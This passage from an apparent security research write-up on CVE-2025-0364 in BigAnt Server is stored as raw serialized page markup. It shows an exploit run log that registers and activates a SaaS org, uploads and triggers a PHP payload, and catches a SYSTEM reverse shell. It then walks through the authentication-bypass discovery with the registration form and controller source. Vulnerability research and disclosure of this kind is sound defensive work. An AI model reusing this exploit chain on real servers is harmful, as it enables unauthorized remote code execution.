version!",[1373,45910,183],{"class":1387},[1373,45912,38991],{"class":4640},[1373,45914,5417],{"class":1397},[1373,45916,45696],{"class":1391},[1373,45918,38999],{"class":4640},[1373,45920,5417],{"class":1397},[1373,45922,45703],{"class":1391},[1373,45924,45925],{"class":4640}," 
vulnerable",[1373,45927,5417],{"class":1397},[1373,45929,45930],{"class":1391},"yes\n",[1373,45932,45933,45935,45937,45939,45941,45943,45945,45947,45949,45951,45954],{"class":1375,"line":4798},[1373,45934,38930],{"class":4640},[1373,45936,5417],{"class":1397},[1373,45938,45847],{"class":1391},[1373,45940,38938],{"class":4640},[1373,45942,5417],{"class":1397},[1373,45944,38943],{"class":1391},[1373,45946,38946],{"class":4640},[1373,45948,5417],{"class":1397},[1373,45950,183],{"class":1387},[1373,45952,45953],{"class":1391},"Password that will be used for authentication: kyLZiAddnH",[1373,45955,19057],{"class":1387},[1373,45957,45958,45960,45962,45964,45966,45968,45970,45972,45974,45976,45979],{"class":1375,"line":4806},[1373,45959,38930],{"class":4640},[1373,45961,5417],{"class":1397},[1373,45963,45847],{"class":1391},[1373,45965,38938],{"class":4640},[1373,45967,5417],{"class":1397},[1373,45969,38943],{"class":1391},[1373,45971,38946],{"class":4640},[1373,45973,5417],{"class":1397},[1373,45975,183],{"class":1387},[1373,45977,45978],{"class":1391},"Registering SaaS org: LBJCUE (mpzo@fldlmarv.com) with password: kyLZiAddnH",[1373,45980,19057],{"class":1387},[1373,45982,45983,45985,45987,45990,45992,45994,45996,45998,46000,46002,46005],{"class":1375,"line":4817},[1373,45984,38930],{"class":4640},[1373,45986,5417],{"class":1397},[1373,45988,45989],{"class":1391},"2025-01-09T14:50:18.675-07:00",[1373,45991,38938],{"class":4640},[1373,45993,5417],{"class":1397},[1373,45995,38943],{"class":1391},[1373,45997,38946],{"class":4640},[1373,45999,5417],{"class":1397},[1373,46001,183],{"class":1387},[1373,46003,46004],{"class":1391},"Getting new PHP session and pinning the SaaS org to the 
session",[1373,46006,19057],{"class":1387},[1373,46008,46009,46011,46013,46016,46018,46020,46022,46024,46026,46028,46031],{"class":1375,"line":4825},[1373,46010,38930],{"class":4640},[1373,46012,5417],{"class":1397},[1373,46014,46015],{"class":1391},"2025-01-09T14:50:18.747-07:00",[1373,46017,38938],{"class":4640},[1373,46019,5417],{"class":1397},[1373,46021,38943],{"class":1391},[1373,46023,38946],{"class":4640},[1373,46025,5417],{"class":1397},[1373,46027,183],{"class":1387},[1373,46029,46030],{"class":1391},"Retrieving org SSID from demo page with session v1cir7mh9v4dfv4ik54mhq6so0",[1373,46032,19057],{"class":1387},[1373,46034,46035,46037,46039,46042,46044,46046,46048,46050,46052,46054,46057],{"class":1375,"line":4835},[1373,46036,38930],{"class":4640},[1373,46038,5417],{"class":1397},[1373,46040,46041],{"class":1391},"2025-01-09T14:50:18.764-07:00",[1373,46043,38938],{"class":4640},[1373,46045,5417],{"class":1397},[1373,46047,38943],{"class":1391},[1373,46049,38946],{"class":4640},[1373,46051,5417],{"class":1397},[1373,46053,183],{"class":1387},[1373,46055,46056],{"class":1391},"Retrieved SSID for LBJCUE: 387360F0-EECD-622B-5B90-C37F2BBD45B3",[1373,46058,19057],{"class":1387},[1373,46060,46061,46063,46065,46068,46070,46072,46074,46076,46078,46080,46083],{"class":1375,"line":4843},[1373,46062,38930],{"class":4640},[1373,46064,5417],{"class":1397},[1373,46066,46067],{"class":1391},"2025-01-09T14:50:18.765-07:00",[1373,46069,38938],{"class":4640},[1373,46071,5417],{"class":1397},[1373,46073,38943],{"class":1391},[1373,46075,38946],{"class":4640},[1373,46077,5417],{"class":1397},[1373,46079,183],{"class":1387},[1373,46081,46082],{"class":1391},"Activating SaaS 
organization",[1373,46084,19057],{"class":1387},[1373,46086,46087,46089,46091,46094,46096,46098,46100,46102,46104,46106,46109],{"class":1375,"line":4849},[1373,46088,38930],{"class":4640},[1373,46090,5417],{"class":1397},[1373,46092,46093],{"class":1391},"2025-01-09T14:50:22.627-07:00",[1373,46095,38938],{"class":4640},[1373,46097,5417],{"class":1397},[1373,46099,38943],{"class":1391},[1373,46101,38946],{"class":4640},[1373,46103,5417],{"class":1397},[1373,46105,183],{"class":1387},[1373,46107,46108],{"class":1391},"Authenticating to the addin SaaS admin",[1373,46110,19057],{"class":1387},[1373,46112,46113,46115,46117,46120,46122,46124,46126,46128,46130,46132,46135],{"class":1375,"line":4877},[1373,46114,38930],{"class":4640},[1373,46116,5417],{"class":1397},[1373,46118,46119],{"class":1391},"2025-01-09T14:50:22.673-07:00",[1373,46121,38938],{"class":4640},[1373,46123,5417],{"class":1397},[1373,46125,38943],{"class":1391},[1373,46127,38946],{"class":4640},[1373,46129,5417],{"class":1397},[1373,46131,183],{"class":1387},[1373,46133,46134],{"class":1391},"Visiting SaaS addin cloud drive page",[1373,46136,19057],{"class":1387},[1373,46138,46139,46141,46143,46146,46148,46150,46152,46154,46156,46158,46161],{"class":1375,"line":4915},[1373,46140,38930],{"class":4640},[1373,46142,5417],{"class":1397},[1373,46144,46145],{"class":1391},"2025-01-09T14:50:22.762-07:00",[1373,46147,38938],{"class":4640},[1373,46149,5417],{"class":1397},[1373,46151,38943],{"class":1391},[1373,46153,38946],{"class":4640},[1373,46155,5417],{"class":1397},[1373,46157,183],{"class":1387},[1373,46159,46160],{"class":1391},"Got cloud drive root path UUID: 
99C8911A-DCB3-E5F2-4298-1E3567AA0DAD",[1373,46162,19057],{"class":1387},[1373,46164,46165,46167,46169,46171,46173,46175,46177,46179,46181,46183,46186,46188,46191,46193,46196],{"class":1375,"line":4931},[1373,46166,38930],{"class":4640},[1373,46168,5417],{"class":1397},[1373,46170,46145],{"class":1391},[1373,46172,38938],{"class":4640},[1373,46174,5417],{"class":1397},[1373,46176,38943],{"class":1391},[1373,46178,38946],{"class":4640},[1373,46180,5417],{"class":1397},[1373,46182,183],{"class":1387},[1373,46184,46185],{"class":1391},"Attempting to upload ",[1373,46187,19169],{"class":1387},[1373,46189,46190],{"class":2206},"JQsaYCKEOu.php",[1373,46192,19169],{"class":1387},[1373,46194,46195],{"class":1391}," to cloud drive addin",[1373,46197,19057],{"class":1387},[1373,46199,46200,46202,46204,46207,46209,46211,46213,46215,46217,46219,46222],{"class":1375,"line":4947},[1373,46201,38930],{"class":4640},[1373,46203,5417],{"class":1397},[1373,46205,46206],{"class":1391},"2025-01-09T14:50:22.819-07:00",[1373,46208,38938],{"class":4640},[1373,46210,5417],{"class":1397},[1373,46212,38943],{"class":1391},[1373,46214,38946],{"class":4640},[1373,46216,5417],{"class":1397},[1373,46218,183],{"class":1387},[1373,46220,46221],{"class":1391},"Attempting to trigger final payload, timeout is expected after callback",[1373,46223,19057],{"class":1387},[1373,46225,46226,46228,46230,46232,46234,46236,46238,46240,46242,46244,46247],{"class":1375,"line":4952},[1373,46227,38930],{"class":4640},[1373,46229,5417],{"class":1397},[1373,46231,46206],{"class":1391},[1373,46233,38938],{"class":4640},[1373,46235,5417],{"class":1397},[1373,46237,38943],{"class":1391},[1373,46239,38946],{"class":4640},[1373,46241,5417],{"class":1397},[1373,46243,183],{"class":1387},[1373,46245,46246],{"class":1391},"Requesting final payload at: 
http:\u002F\u002F10.0.0.104:8000\u002Fdata\u002F387360F0-EECD-622B-5B90-C37F2BBD45B3\u002Fpan\u002F99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\u002F2025-01-09\u002FJQsaYCKEOu.php",[1373,46248,19057],{"class":1387},[1373,46250,46251,46253,46255,46258,46260,46262,46264,46266,46268,46270,46273],{"class":1375,"line":6776},[1373,46252,38930],{"class":4640},[1373,46254,5417],{"class":1397},[1373,46256,46257],{"class":1391},"2025-01-09T14:50:22.821-07:00",[1373,46259,38938],{"class":4640},[1373,46261,5417],{"class":1397},[1373,46263,39062],{"class":1391},[1373,46265,38946],{"class":4640},[1373,46267,5417],{"class":1397},[1373,46269,183],{"class":1387},[1373,46271,46272],{"class":1391},"Caught new shell from 10.0.0.104:51690",[1373,46274,19057],{"class":1387},[1373,46276,46277,46279,46281,46283,46285,46287,46289,46291,46293,46295,46298],{"class":1375,"line":6781},[1373,46278,38930],{"class":4640},[1373,46280,5417],{"class":1397},[1373,46282,46257],{"class":1391},[1373,46284,38938],{"class":4640},[1373,46286,5417],{"class":1397},[1373,46288,38943],{"class":1391},[1373,46290,38946],{"class":4640},[1373,46292,5417],{"class":1397},[1373,46294,183],{"class":1387},[1373,46296,46297],{"class":1391},"Active shell from 10.0.0.104:51690",[1373,46299,19057],{"class":1387},[1373,46301,46302,46304,46307,46310],{"class":1375,"line":7524},[1373,46303,3129],{"class":2206},[1373,46305,46306],{"class":1391}," Windows",[1373,46308,46309],{"class":4640}," [Version ",[1373,46311,46312],{"class":1391},"10.0.17763.107]\n",[1373,46314,46315,46317,46319,46321,46324,46327,46330,46333,46336],{"class":1375,"line":7530},[1373,46316,1384],{"class":1383},[1373,46318,28578],{"class":2206},[1373,46320,2230],{"class":1383},[1373,46322,46323],{"class":2206}," 2018",[1373,46325,46326],{"class":1391}," Microsoft",[1373,46328,46329],{"class":1391}," Corporation.",[1373,46331,46332],{"class":1391}," All",[1373,46334,46335],{"class":1391}," rights",[1373,46337,46338],{"class":1391}," 
reserved.\n",[1373,46340,46341],{"class":1375,"line":7546},[1373,46342,6520],{"emptyLinePlaceholder":237},[1373,46344,46345,46348,46351,46354,46357,46360,46363,46366,46369,46372,46375,46378,46381,46384,46387,46390,46393,46396,46399,46402,46405,46408,46411],{"class":1375,"line":7571},[1373,46346,46347],{"class":2206},"C:\\Program",[1373,46349,46350],{"class":1391}," Files",[1373,46352,46353],{"class":4640}," (x86)",[1373,46355,46356],{"class":2326},"\\B",[1373,46358,46359],{"class":4640},"igAntSoft",[1373,46361,46362],{"class":2326},"\\I",[1373,46364,46365],{"class":4640},"M Console",[1373,46367,46368],{"class":2326},"\\i",[1373,46370,46371],{"class":4640},"m_webserver",[1373,46373,46374],{"class":2326},"\\h",[1373,46376,46377],{"class":4640},"tdocs",[1373,46379,46380],{"class":2326},"\\d",[1373,46382,46383],{"class":4640},"ata",[1373,46385,46386],{"class":2326},"\\3",[1373,46388,46389],{"class":4640},"87360F0-EECD-622B-5B90-C37F2BBD45B3",[1373,46391,46392],{"class":2326},"\\p",[1373,46394,46395],{"class":4640},"an",[1373,46397,46398],{"class":2326},"\\9",[1373,46400,46401],{"class":4640},"9C8911A-DCB3-E5F2-4298-1E3567AA0DAD",[1373,46403,46404],{"class":2326},"\\2",[1373,46406,46407],{"class":4640},"025-01-",[1373,46409,46410],{"class":1397},"09>",[1373,46412,35556],{"class":4640},[1373,46414,46415],{"class":1375,"line":7598},[1373,46416,35556],{"class":2206},[1373,46418,46419,46422,46425,46428],{"class":1375,"line":7615},[1373,46420,46421],{"class":2206},"nt",[1373,46423,46424],{"class":1391}," authority",[1373,46426,46427],{"class":2326},"\\s",[1373,46429,46430],{"class":1391},"ystem\n",[18,46432,46433],{},"While the shells are always great, the full path of discovery to exploitation can be just as valuable than the exploit.",[61,46435,46437],{"id":46436},"authentication-paths-saas-organizations","Authentication Paths & SaaS Organizations",[18,46439,46440],{},"After having the initial disappointing run in with a bad CVSS score assignment(PR is wrong so often), we 
decided to see if it was possible to quickly identify an authentication bypass vulnerability to amend the sins of the first CVSS score. The investigation combined static analysis with some simple fuzzing of paths to identify all unauthenticated endpoints before diving too deep into application logic. The server utilizes the ThinkPHP framework, which is popular among Chinese vendors, and uses a model-view-controller design.",[18,46442,46443,46444,46447,46448,46451],{},"Investigation started with a quick enumeration of default exposed web pages, which revealed multiple views to landing pages that all appeared to be outside the standard ",[886,46445,46446],{},"\u002Findex.php\u002FHome\u002Flogin\u002Findex.html"," route. The most notable of the endpoints were multiple instances of account registration pages, which are a common vector for obtaining partial authentication or unexpected session settings, making them a prime target for an attacker. The one that showed the most \"red flags\" was the ",[886,46449,46450],{},"\u002Findex.php\u002FHome\u002FSaas\u002Freg_email.html"," URI, which presented the following page:",[18,46453,46454],{},[68,46455],{"alt":46456,"src":46457,":width":10862},"BigAnt SaaS registration landing page","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-1-saas-registration.png",[18,46459,46460],{},"These are the exact red flags we look for: auto-filled QQ addresses and user information, no documentation, a custom CAPTCHA, and a mention of organizational registration. Non-user-initiated role creation is often a good place to look for authentication bypasses, as machine, API, or group accounts often don't follow expected single-user logic. 
Filling out the information and solving the CAPTCHA, we land on the following success message:",[18,46462,46463],{},[68,46464],{"alt":46465,"src":46466,":width":10862},"BigAnt successful SaaS registration message","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-2-saas-registration.png",[18,46468,46469],{},"The server then sends an email, if configured with proper SMTP settings, with the SaaS registration information and an activation link containing a UUID. As an attacker, we don't want to burn any email addresses under our control or leave breadcrumbs, and we do not want to rely on the SMTP server having a complete configuration, so it was time to see if we could get the registration activation variables without a configured SMTP server or an email. We dug into what happens in these requests to see if there's anything we can use.",[18,46471,46472,46473,46476,46477,46480],{},"ThinkPHP allows you to embed function calls inside of HTML forms and other backend content that corresponds to the HTML file field information. This means that function references inside the HTML files are resolved to the corresponding controller functions. 
We can verify this by checking that the HTML file calls the ",[886,46474,46475],{},"reg_email_post"," function with the data provided in the ",[886,46478,46479],{},"Application\u002FHome\u002FView\u002FSaas\u002Freg_email.html"," page:",[1354,46482,46484],{"className":8228,"code":46483,"language":8230,"meta":219,"style":219},"\u003Cextend name=\"Public\u002Fbase\" \u002F>\n\n\n\u003Cblock name=\"main\">\n\n    \u003Cform id=\"form\"  action=\"{:U('reg_email_post')}\" method=\"post\">\n    \u003Cdiv class=\"form-box\">\n        \u003Cdiv class=\"form-header\">{:L('_SAAS_REGISTER_')}\u003C\u002Fdiv>\n        \u003Cdiv class=\"form-body\">\n            \u003Cdiv class=\"form\">\n                \u003Cdiv class=\"form-group\">\n                    \u003Cinput type=\"text\" name=\"saas_showname\" id=\"saas_showname\" placeholder=\"{:L('_SHOWNAME_')}\" class=\"form-control required\" minlength=\"2\" maxlength=\"20\">\n                \u003C\u002Fdiv>\n                \u003Cdiv class=\"form-group\">\n                    \u003Cinput type=\"text\" name=\"saas_name\" id=\"saas_name\" placeholder=\"{:L('_SAASNAME_')}\" class=\"form-control required chrnum\">\n                \u003C\u002Fdiv>\n                \u003Cdiv class=\"form-group\">\n                    \u003Cinput type=\"text\" name=\"org_email\" id=\"org_email\" placeholder=\"{:L('_EMAIL_')}\" class=\"form-control required email\">\n                \u003C\u002Fdiv>\n                \u003Cdiv class=\"form-group\">\n                    \u003Cinput type=\"text\" name=\"saas_pwd\" id=\"saas_pwd\" placeholder=\"{:L('_PASSWORD_')}\" class=\"form-control required pwd\" minlength=\"6\" maxlength=\"20\">\n                
\u003C\u002Fdiv>\n\n",[886,46485,46486,46509,46513,46517,46536,46540,46582,46602,46632,46651,46670,46690,46775,46784,46802,46863,46871,46889,46950,46958,46976,47057],{"__ignoreMap":219},[1373,46487,46488,46490,46494,46497,46499,46501,46504,46506],{"class":1375,"line":1376},[1373,46489,11852],{"class":1383},[1373,46491,46493],{"class":46492},"snv6S","extend",[1373,46495,46496],{"class":8252}," name",[1373,46498,5417],{"class":1383},[1373,46500,183],{"class":1387},[1373,46502,46503],{"class":1391},"Public\u002Fbase",[1373,46505,183],{"class":1387},[1373,46507,46508],{"class":1383}," \u002F>\n",[1373,46510,46511],{"class":1375,"line":220},[1373,46512,6520],{"emptyLinePlaceholder":237},[1373,46514,46515],{"class":1375,"line":1266},[1373,46516,6520],{"emptyLinePlaceholder":237},[1373,46518,46519,46521,46523,46525,46527,46529,46532,46534],{"class":1375,"line":1852},[1373,46520,11852],{"class":1383},[1373,46522,10876],{"class":46492},[1373,46524,46496],{"class":8252},[1373,46526,5417],{"class":1383},[1373,46528,183],{"class":1387},[1373,46530,46531],{"class":1391},"main",[1373,46533,183],{"class":1387},[1373,46535,6765],{"class":1383},[1373,46537,46538],{"class":1375,"line":4692},[1373,46539,6520],{"emptyLinePlaceholder":237},[1373,46541,46542,46544,46546,46548,46550,46552,46554,46556,46559,46561,46563,46566,46568,46571,46573,46575,46578,46580],{"class":1375,"line":4724},[1373,46543,8246],{"class":1383},[1373,46545,21325],{"class":6300},[1373,46547,7911],{"class":8252},[1373,46549,5417],{"class":1383},[1373,46551,183],{"class":1387},[1373,46553,21325],{"class":1391},[1373,46555,183],{"class":1387},[1373,46557,46558],{"class":8252},"  action",[1373,46560,5417],{"class":1383},[1373,46562,183],{"class":1387},[1373,46564,46565],{"class":1391},"{:U('reg_email_post')}",[1373,46567,183],{"class":1387},[1373,46569,46570],{"class":8252}," 
method",[1373,46572,5417],{"class":1383},[1373,46574,183],{"class":1387},[1373,46576,46577],{"class":1391},"post",[1373,46579,183],{"class":1387},[1373,46581,6765],{"class":1383},[1373,46583,46584,46586,46589,46591,46593,46595,46598,46600],{"class":1375,"line":4756},[1373,46585,8246],{"class":1383},[1373,46587,46588],{"class":6300},"div",[1373,46590,27205],{"class":8252},[1373,46592,5417],{"class":1383},[1373,46594,183],{"class":1387},[1373,46596,46597],{"class":1391},"form-box",[1373,46599,183],{"class":1387},[1373,46601,6765],{"class":1383},[1373,46603,46604,46607,46609,46611,46613,46615,46618,46620,46622,46625,46628,46630],{"class":1375,"line":4768},[1373,46605,46606],{"class":1383},"        \u003C",[1373,46608,46588],{"class":6300},[1373,46610,27205],{"class":8252},[1373,46612,5417],{"class":1383},[1373,46614,183],{"class":1387},[1373,46616,46617],{"class":1391},"form-header",[1373,46619,183],{"class":1387},[1373,46621,5384],{"class":1383},[1373,46623,46624],{"class":4640},"{:L('_SAAS_REGISTER_')}",[1373,46626,46627],{"class":1383},"\u003C\u002F",[1373,46629,46588],{"class":6300},[1373,46631,6765],{"class":1383},[1373,46633,46634,46636,46638,46640,46642,46644,46647,46649],{"class":1375,"line":4792},[1373,46635,46606],{"class":1383},[1373,46637,46588],{"class":6300},[1373,46639,27205],{"class":8252},[1373,46641,5417],{"class":1383},[1373,46643,183],{"class":1387},[1373,46645,46646],{"class":1391},"form-body",[1373,46648,183],{"class":1387},[1373,46650,6765],{"class":1383},[1373,46652,46653,46656,46658,46660,46662,46664,46666,46668],{"class":1375,"line":4798},[1373,46654,46655],{"class":1383},"            \u003C",[1373,46657,46588],{"class":6300},[1373,46659,27205],{"class":8252},[1373,46661,5417],{"class":1383},[1373,46663,183],{"class":1387},[1373,46665,21325],{"class":1391},[1373,46667,183],{"class":1387},[1373,46669,6765],{"class":1383},[1373,46671,46672,46675,46677,46679,46681,46683,46686,46688],{"class":1375,"line":4806},[1373,46673,46674],{"class":1383},"  
              \u003C",[1373,46676,46588],{"class":6300},[1373,46678,27205],{"class":8252},[1373,46680,5417],{"class":1383},[1373,46682,183],{"class":1387},[1373,46684,46685],{"class":1391},"form-group",[1373,46687,183],{"class":1387},[1373,46689,6765],{"class":1383},[1373,46691,46692,46695,46697,46699,46701,46703,46705,46707,46709,46711,46713,46716,46718,46720,46722,46724,46726,46728,46731,46733,46735,46738,46740,46742,46744,46746,46749,46751,46754,46756,46758,46760,46762,46765,46767,46769,46771,46773],{"class":1375,"line":4817},[1373,46693,46694],{"class":1383},"                    \u003C",[1373,46696,15129],{"class":6300},[1373,46698,8253],{"class":8252},[1373,46700,5417],{"class":1383},[1373,46702,183],{"class":1387},[1373,46704,1359],{"class":1391},[1373,46706,183],{"class":1387},[1373,46708,46496],{"class":8252},[1373,46710,5417],{"class":1383},[1373,46712,183],{"class":1387},[1373,46714,46715],{"class":1391},"saas_showname",[1373,46717,183],{"class":1387},[1373,46719,7911],{"class":8252},[1373,46721,5417],{"class":1383},[1373,46723,183],{"class":1387},[1373,46725,46715],{"class":1391},[1373,46727,183],{"class":1387},[1373,46729,46730],{"class":8252}," placeholder",[1373,46732,5417],{"class":1383},[1373,46734,183],{"class":1387},[1373,46736,46737],{"class":1391},"{:L('_SHOWNAME_')}",[1373,46739,183],{"class":1387},[1373,46741,27205],{"class":8252},[1373,46743,5417],{"class":1383},[1373,46745,183],{"class":1387},[1373,46747,46748],{"class":1391},"form-control required",[1373,46750,183],{"class":1387},[1373,46752,46753],{"class":8252}," minlength",[1373,46755,5417],{"class":1383},[1373,46757,183],{"class":1387},[1373,46759,353],{"class":1391},[1373,46761,183],{"class":1387},[1373,46763,46764],{"class":8252}," 
maxlength",[1373,46766,5417],{"class":1383},[1373,46768,183],{"class":1387},[1373,46770,36929],{"class":1391},[1373,46772,183],{"class":1387},[1373,46774,6765],{"class":1383},[1373,46776,46777,46780,46782],{"class":1375,"line":4825},[1373,46778,46779],{"class":1383},"                \u003C\u002F",[1373,46781,46588],{"class":6300},[1373,46783,6765],{"class":1383},[1373,46785,46786,46788,46790,46792,46794,46796,46798,46800],{"class":1375,"line":4835},[1373,46787,46674],{"class":1383},[1373,46789,46588],{"class":6300},[1373,46791,27205],{"class":8252},[1373,46793,5417],{"class":1383},[1373,46795,183],{"class":1387},[1373,46797,46685],{"class":1391},[1373,46799,183],{"class":1387},[1373,46801,6765],{"class":1383},[1373,46803,46804,46806,46808,46810,46812,46814,46816,46818,46820,46822,46824,46827,46829,46831,46833,46835,46837,46839,46841,46843,46845,46848,46850,46852,46854,46856,46859,46861],{"class":1375,"line":4843},[1373,46805,46694],{"class":1383},[1373,46807,15129],{"class":6300},[1373,46809,8253],{"class":8252},[1373,46811,5417],{"class":1383},[1373,46813,183],{"class":1387},[1373,46815,1359],{"class":1391},[1373,46817,183],{"class":1387},[1373,46819,46496],{"class":8252},[1373,46821,5417],{"class":1383},[1373,46823,183],{"class":1387},[1373,46825,46826],{"class":1391},"saas_name",[1373,46828,183],{"class":1387},[1373,46830,7911],{"class":8252},[1373,46832,5417],{"class":1383},[1373,46834,183],{"class":1387},[1373,46836,46826],{"class":1391},[1373,46838,183],{"class":1387},[1373,46840,46730],{"class":8252},[1373,46842,5417],{"class":1383},[1373,46844,183],{"class":1387},[1373,46846,46847],{"class":1391},"{:L('_SAASNAME_')}",[1373,46849,183],{"class":1387},[1373,46851,27205],{"class":8252},[1373,46853,5417],{"class":1383},[1373,46855,183],{"class":1387},[1373,46857,46858],{"class":1391},"form-control required 
chrnum",[1373,46860,183],{"class":1387},[1373,46862,6765],{"class":1383},[1373,46864,46865,46867,46869],{"class":1375,"line":4849},[1373,46866,46779],{"class":1383},[1373,46868,46588],{"class":6300},[1373,46870,6765],{"class":1383},[1373,46872,46873,46875,46877,46879,46881,46883,46885,46887],{"class":1375,"line":4877},[1373,46874,46674],{"class":1383},[1373,46876,46588],{"class":6300},[1373,46878,27205],{"class":8252},[1373,46880,5417],{"class":1383},[1373,46882,183],{"class":1387},[1373,46884,46685],{"class":1391},[1373,46886,183],{"class":1387},[1373,46888,6765],{"class":1383},[1373,46890,46891,46893,46895,46897,46899,46901,46903,46905,46907,46909,46911,46914,46916,46918,46920,46922,46924,46926,46928,46930,46932,46935,46937,46939,46941,46943,46946,46948],{"class":1375,"line":4915},[1373,46892,46694],{"class":1383},[1373,46894,15129],{"class":6300},[1373,46896,8253],{"class":8252},[1373,46898,5417],{"class":1383},[1373,46900,183],{"class":1387},[1373,46902,1359],{"class":1391},[1373,46904,183],{"class":1387},[1373,46906,46496],{"class":8252},[1373,46908,5417],{"class":1383},[1373,46910,183],{"class":1387},[1373,46912,46913],{"class":1391},"org_email",[1373,46915,183],{"class":1387},[1373,46917,7911],{"class":8252},[1373,46919,5417],{"class":1383},[1373,46921,183],{"class":1387},[1373,46923,46913],{"class":1391},[1373,46925,183],{"class":1387},[1373,46927,46730],{"class":8252},[1373,46929,5417],{"class":1383},[1373,46931,183],{"class":1387},[1373,46933,46934],{"class":1391},"{:L('_EMAIL_')}",[1373,46936,183],{"class":1387},[1373,46938,27205],{"class":8252},[1373,46940,5417],{"class":1383},[1373,46942,183],{"class":1387},[1373,46944,46945],{"class":1391},"form-control required 
email",[1373,46947,183],{"class":1387},[1373,46949,6765],{"class":1383},[1373,46951,46952,46954,46956],{"class":1375,"line":4931},[1373,46953,46779],{"class":1383},[1373,46955,46588],{"class":6300},[1373,46957,6765],{"class":1383},[1373,46959,46960,46962,46964,46966,46968,46970,46972,46974],{"class":1375,"line":4947},[1373,46961,46674],{"class":1383},[1373,46963,46588],{"class":6300},[1373,46965,27205],{"class":8252},[1373,46967,5417],{"class":1383},[1373,46969,183],{"class":1387},[1373,46971,46685],{"class":1391},[1373,46973,183],{"class":1387},[1373,46975,6765],{"class":1383},[1373,46977,46978,46980,46982,46984,46986,46988,46990,46992,46994,46996,46998,47001,47003,47005,47007,47009,47011,47013,47015,47017,47019,47022,47024,47026,47028,47030,47033,47035,47037,47039,47041,47043,47045,47047,47049,47051,47053,47055],{"class":1375,"line":4952},[1373,46979,46694],{"class":1383},[1373,46981,15129],{"class":6300},[1373,46983,8253],{"class":8252},[1373,46985,5417],{"class":1383},[1373,46987,183],{"class":1387},[1373,46989,1359],{"class":1391},[1373,46991,183],{"class":1387},[1373,46993,46496],{"class":8252},[1373,46995,5417],{"class":1383},[1373,46997,183],{"class":1387},[1373,46999,47000],{"class":1391},"saas_pwd",[1373,47002,183],{"class":1387},[1373,47004,7911],{"class":8252},[1373,47006,5417],{"class":1383},[1373,47008,183],{"class":1387},[1373,47010,47000],{"class":1391},[1373,47012,183],{"class":1387},[1373,47014,46730],{"class":8252},[1373,47016,5417],{"class":1383},[1373,47018,183],{"class":1387},[1373,47020,47021],{"class":1391},"{:L('_PASSWORD_')}",[1373,47023,183],{"class":1387},[1373,47025,27205],{"class":8252},[1373,47027,5417],{"class":1383},[1373,47029,183],{"class":1387},[1373,47031,47032],{"class":1391},"form-control required 
pwd",[1373,47034,183],{"class":1387},[1373,47036,46753],{"class":8252},[1373,47038,5417],{"class":1383},[1373,47040,183],{"class":1387},[1373,47042,356],{"class":1391},[1373,47044,183],{"class":1387},[1373,47046,46764],{"class":8252},[1373,47048,5417],{"class":1383},[1373,47050,183],{"class":1387},[1373,47052,36929],{"class":1391},[1373,47054,183],{"class":1387},[1373,47056,6765],{"class":1383},[1373,47058,47059,47061,47063],{"class":1375,"line":6776},[1373,47060,46779],{"class":1383},[1373,47062,46588],{"class":6300},[1373,47064,6765],{"class":1383},[18,47066,2245,47067,47069,47070,47073,47074,4606],{},[886,47068,46475],{}," function call is called inside of ",[886,47071,47072],{},"Application\u002FHome\u002FController\u002FSaasController.class.php:63",", which handles the sending of the email with the filled in data from the backend and user provided information. We want to follow the logic of where the UUID gets set and that appears in the following as the ",[886,47075,47076],{},"saas_id",[1354,47078,47080],{"className":1367,"code":47079,"language":1369,"meta":219,"style":219},"\u002F**\n * 邮箱saas\n * 1 新增SAAS\n * 2 发送邮件\n * 3 通过邮件地址激活SAAS\n *\u002F\nfunction reg_email_post(){\n\n    \u002F*\n    if(!$this->check_verify(I('verify'))){\n        $this->error(L('_VALID_VERIFY_ERROR_'));exit;\n    };\n    *\u002F\n     \n    $res = $this->reg_saas(0);\n    \n    if($res['status']){\n        $url = sp_get_host() . 
U('reg_activation',array('saas_id'=>$saasId))  ; \u002F\u002F生成激活的URL地址\n        \u002F\u002F发送邮件\n        $subject = L('_ACTIVATION_MAIL_SUBJECT_') ;\n        $content = L('_ACTIVATION_MAIL_CONTENT_') ;\n        $content = str_replace('[url]',$url,$content);\n        $content = str_replace('[minute]',$M->activation_expire_miniute,$content);\n        $res =sp_send_mail($data['org_email'], $subject, $content) ;\n        if ($res){\n            $url = U('reg_email_ok',array('saas_id'=>$saasId));\n            $this->success(L('_ADD_SUCCESS_'), $url);\n        }else{\n            $this->error($res['err_msg']);\n        }\n    }else{\n        $this->error($M->getError());\n    }\n}\n",[886,47081,47082,47087,47092,47097,47102,47107,47112,47122,47126,47131,47136,47141,47145,47150,47155,47177,47182,47202,47259,47264,47290,47314,47344,47379,47419,47431,47471,47501,47510,47533,47537,47545,47565,47569],{"__ignoreMap":219},[1373,47083,47084],{"class":1375,"line":1376},[1373,47085,47086],{"class":4630},"\u002F**\n",[1373,47088,47089],{"class":1375,"line":220},[1373,47090,47091],{"class":4630}," * 邮箱saas\n",[1373,47093,47094],{"class":1375,"line":1266},[1373,47095,47096],{"class":4630}," * 1 新增SAAS\n",[1373,47098,47099],{"class":1375,"line":1852},[1373,47100,47101],{"class":4630}," * 2 发送邮件\n",[1373,47103,47104],{"class":1375,"line":4692},[1373,47105,47106],{"class":4630}," * 3 通过邮件地址激活SAAS\n",[1373,47108,47109],{"class":1375,"line":4724},[1373,47110,47111],{"class":4630}," *\u002F\n",[1373,47113,47114,47116,47119],{"class":1375,"line":4756},[1373,47115,8560],{"class":7293},[1373,47117,47118],{"class":7297}," reg_email_post",[1373,47120,47121],{"class":1383},"(){\n",[1373,47123,47124],{"class":1375,"line":4768},[1373,47125,6520],{"emptyLinePlaceholder":237},[1373,47127,47128],{"class":1375,"line":4792},[1373,47129,47130],{"class":4630},"    \u002F*\n",[1373,47132,47133],{"class":1375,"line":4798},[1373,47134,47135],{"class":4630},"    
